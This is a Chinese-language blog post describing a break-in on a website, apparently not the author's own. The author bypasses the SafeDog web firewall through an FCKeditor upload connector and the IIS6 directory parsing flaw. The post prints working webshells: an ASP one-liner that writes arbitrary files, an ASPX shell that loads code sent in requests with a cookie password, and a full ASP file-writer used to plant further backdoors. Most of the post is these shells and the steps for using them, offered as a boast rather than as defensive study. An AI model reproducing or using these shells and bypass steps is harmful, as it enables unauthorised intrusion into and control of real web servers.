FCK上传绕过安全狗一则经验谈 - 网站安全 - 自学

安全狗真的是个很垃圾的程序，作为一个安全防护软件，安全狗不安全。这句话就是我说的，一个技术团队的产品是和这个团队的技术实力直接挂钩的。

 

这个地址来自一个QQ上面的好友，其实本来我不想看这个的，但是久闻安全狗的臭名，那么今天就百闻不如一打，技术不专，学艺不精，该打。http://HdhCmsTest2cto测试数据 /fckeditor/editor/filemanager/connectors/test.html

复制代码FCKeditor的browser被删了，但是connector和测试页面都在，那就没问题了。

准备一个图片马，命名为a.asp;.gif然后上传，FCK自动重命名为a_asp;.gif，遇到这种情况，同一个文件再传一遍，文件就自动重命名为a.asp;(1).gif。

但是访问：http://HdhCmsTest2cto测试数据 /YourUploadFilePath/file/a.asp;(1).gif

复制代码却弹出提示：

您的请求带有不合法的参数，谢谢合作！

来自安全狗互联网安全实验室-网站安全狗软件的友好提示，了解更多请点击

不过看到朋友已经把.asp文件夹建好了。直接传个图片到/shell.asp/这个文件夹，利用iis6的解析 漏洞 ，就可以解析成 asp 了，而且绕过了安全狗。

不过知道好多马儿都上不去，菜刀一句话也403没辙。干脆就用别的了<%If request("cmd")<>"" And request("path")<>"" then Createobject("Scri"&"pting.FileSys"&"temObject").CreateTextFile(server.mappath(request("path"))).WriteLine request("cmd")%>

复制代码这是上传文件的一句话服务端，这个一句话可以用习科兵器库[Attach.BlackBap.Org] 网站安全 分类下的asp上传类一句话ShellClient连接并上传文件。

除了这个工具，[ASPX一句话shell客户端]这个工具也可以完美的绕过安全狗。

这个aspx的服务端是：<%@ Page Language="C#" ValidateRequest="false" %>

 

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

复制代码密码是psw，但是现在上传后门是在/shell.asp/这个目录，如果命名aspx是500不解析的。如果加分号，对aspx也是没用的。

在[新后门]那里如果写xxx.asp,xxx.asa,xxx.cer都没问题，但是上传xxx.aspx这样的把目录转出去到/shell.asp/文件夹外面的话就失败了

想想怎么把aspx的后门写到/shell.asp/目录外面。用了个小马：<%

 

dim objFSO

 

dim fdata

 

dim objCountFile

 

on error resume next

 

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")

 

if Trim(request("systempath"))<>"" then

 

fdata = request("sAvedata")

 

Set objCountFile=objFSO.CreateTextFile(request("systempath"),True)

 

objCountFile.Write fdata

 

if err =0 then

 

response.write "<font color=red>保存成功!</font>"

 

else

 

response.write "<font color=red>保存失败!</font>"

 

end if

 

err.clear

 

end if

 

objCountFile.Close

 

Set objCountFile=Nothing

 

Set objFSO = Nothing

 

Response.write "<form action='' method=post>"

 

Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>"

 

Response.Write "<input type=text name=systempath width=32 size=50>"

 

Response.Write "<br>"

 

Response.write "本文件绝对路径"

 

Response.write server.mappath(Request.ServerVariables("SCRIPT_NAME"))

 

Response.write "<br>"

 

Response.write "输入马的内容:"

 

Response.write "<textarea name=sAvedata cols=80 rows=10 width=32></textarea>"

 

Response.write "<input type=submit value=保存>"

 

Response.write "</form>"

 

%>

复制代码这样就把aspx的马写到外面了

asp上传大马会提示危险参数禁止上传，但是用这个aspx就没问题了。这个网站路径是：E:\网站程序\rsc\，可惜这个aspx客户端不支持中文路径。

这个问题也好解决。看截图：

 

 

 

 

只需要cmd拷贝一下就可以了。asp的大马轻松运行无压力。

这个站我真的没有被安全狗难倒，秒杀。有些东西只是纸老虎而已 

 

查看更多关于FCK上传绕过安全狗一则经验谈 - 网站安全 - 自学的详细内容...